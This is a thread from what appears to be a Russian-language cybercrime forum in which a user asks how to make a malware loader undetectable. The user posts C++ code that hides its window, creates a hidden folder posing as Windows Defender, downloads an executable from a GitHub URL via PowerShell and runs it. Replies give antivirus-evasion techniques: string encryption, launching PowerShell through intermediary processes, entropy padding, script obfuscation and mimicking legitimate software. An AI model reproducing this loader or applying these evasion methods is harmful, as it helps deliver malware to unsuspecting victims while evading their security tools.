• XSS.stack #1 – первый литературный журнал от юзеров форума

Как сделать андетект

Отслеживать

JOHR

HDD-drive
Пользователь
Регистрация
20.10.2024
Сообщения
44
Реакции
2
Всем привет, написал простой инсталлер на с++ с winapi, 9 детектов из 72, многие антивирусы не детектят, а вд детектит, что сделать чтоб был андетект?(не судите строго код пишу вторую неделю и не сильно шарю)


C++: 
#include <windows.h>
#include <iostream>


using namespace std;

void wejughtwyhtgu234()
{
    
    LPCSTR applicationName = "C:\\ProgramData\\WindowsDefender\\WindowsDefender.exe";

  
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    
    if (CreateProcessA(applicationName,   
        NULL,             
        NULL,             
        NULL,             
        FALSE,           
        0,                 
        NULL,             
        NULL,             
        &si,             
        &pi)             
        ){ }
}

int main()
    {


    ShowWindow(GetConsoleWindow(), SW_HIDE);
    LPCSTR AttrebutDirectory = "C:\\ProgramData\\WindowsDefender";
    LPCTSTR Directory = L"C:\\ProgramData\\WindowsDefender";
    CreateDirectory(Directory, NULL);
    SetFileAttributesA(AttrebutDirectory, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM);
    
    
    
    const char* directoryPath = "C:\\ProgramData\\WindowsDefender\\";
    const char* fileName = "WindowsDefender.exe";

    std::string command = "powershell -Command \"Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/KERMOSINIUS/4525rw/refs/heads/main/WindowsDefender.exe' -OutFile '" + std::string(directoryPath) + fileName + "'\"";

    
    system(command.c_str());
    
    wejughtwyhtgu234();
    return 0;
}
 
1) Адекватный нейминг путей для сохранения скачиваемого файла, в идеале их рандомить. WindowsDefender.exe = палево.
2) Зашифровать строки в твоём бинарнике, расшифровывать по мере использования и забивать память, выделенную под эти строки нулями после использования.
3) Не спавнить powershell.exe напрямую, передавать ему управление через процессы-посредники, например schtasks, explorer, control и т.д.
4) Проконтроллировать, чтобы у файла была адекватная энтропия, можно добавить ресурсов и трешкода, который будет вызываться во время исполнения.
5) Обфускация самого ПШ скрипта.

З.Ы: ShowWindow(GetConsoleWindow(), SW_HIDE); не имеет смысла. Собирай лоадер как GUI приложение (/SUBSYSTEM:WINDOWS) и не используй эти костыли.
З.Ы.Ы: C++ - компилируемый ЯП, от того, что ты будешь называть функции рандомным набором букв и цифр, у тебя только ухудшится читабельность кода, а на детекты это не повлияет.
 
xxxxxxxx сказал(а):
1) Адекватный нейминг путей для сохранения скачиваемого файла, в идеале их рандомить. WindowsDefender.exe = палево.
2) Зашифровать строки в твоём бинарнике, расшифровывать по мере использования и забивать память, выделенную под эти строки нулями после использования.
3) Не спавнить powershell.exe напрямую, передавать ему управление через процессы-посредники, например schtasks, explorer, control и т.д.
4) Проконтроллировать, чтобы у файла была адекватная энтропия, можно добавить ресурсов и трешкода, который будет вызываться во время исполнения.
5) Обфускация самого ПШ скрипта.

З.Ы: ShowWindow(GetConsoleWindow(), SW_HIDE); не имеет смысла. Собирай лоадер как GUI приложение (/SUBSYSTEM:WINDOWS) и не используй эти костыли.
З.Ы.Ы: C++ - компилируемый ЯП, от того, что ты будешь называть функции рандомным набором букв и цифр, у тебя только ухудшится читабельность кода, а на детекты это не повлияет.
можешь дать линки где про это можно прочитать или что то подобное, для меня всё кроме первого пункта - незнакомое
 
DropMaster сказал(а):
не сканить на вирустотале) это же пиздец
каждую правку внесённую в код будут детектить вже через день
да и так с нуля буду переписывать
 
JOHR сказал(а):
да и так с нуля буду переписывать
общий скан делай на платных сканерах, чтобы не сливать файл
что-то мелкое или фикс - на вирте

p.s. proxy за что дизлайк?
 
proxy сказал(а):
В наше время если твой код не переживает заливку на ВТ то он не жизнеспособен. С пониманием можно отнестись к этому если нет сурсов. Но если в руках есть сурс, а темболее что то делаешь с нуля, то не сделать FUD на ВТ это грех.

Мой совет тебе, не используй что то явно сырое и банальное. Пробуй мимикрировать под что то легитимное и уже потом накручивать вредоносный код.
Для начала создай приложение которое будет полностью чистое и обходить все системы защиты при анализе. Уже потом накручивай и смотри что палится.
Можешь взять легитимный софт-сурс и его пересобрать. Посмотреть что и как. И, еще, у меня в студии тоже не получилось сделать полностью чистый файл.
Используй gcc и mingw из сконсоли, жалательно под Линуксом. Редактор кода можешь использовать любой.
А если зашифровать команду и она будет расшифровываться во время выполнения?
 
xxxxxxxx сказал(а):
З.Ы.Ы: C++ - компилируемый ЯП, от того, что ты будешь называть функции рандомным набором букв и цифр, у тебя только ухудшится читабельность кода, а на детекты это не повлияет.
правда стоит сказать что дебаг символы нужно отключать, и еще желательно не юзать мсвц
 
Не про вирусню, но всё же:
  • используй Unicode версии WinApi при работе с файлами/папками
  • имена функций не имеют значения в итоге, можно писать понятное название
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх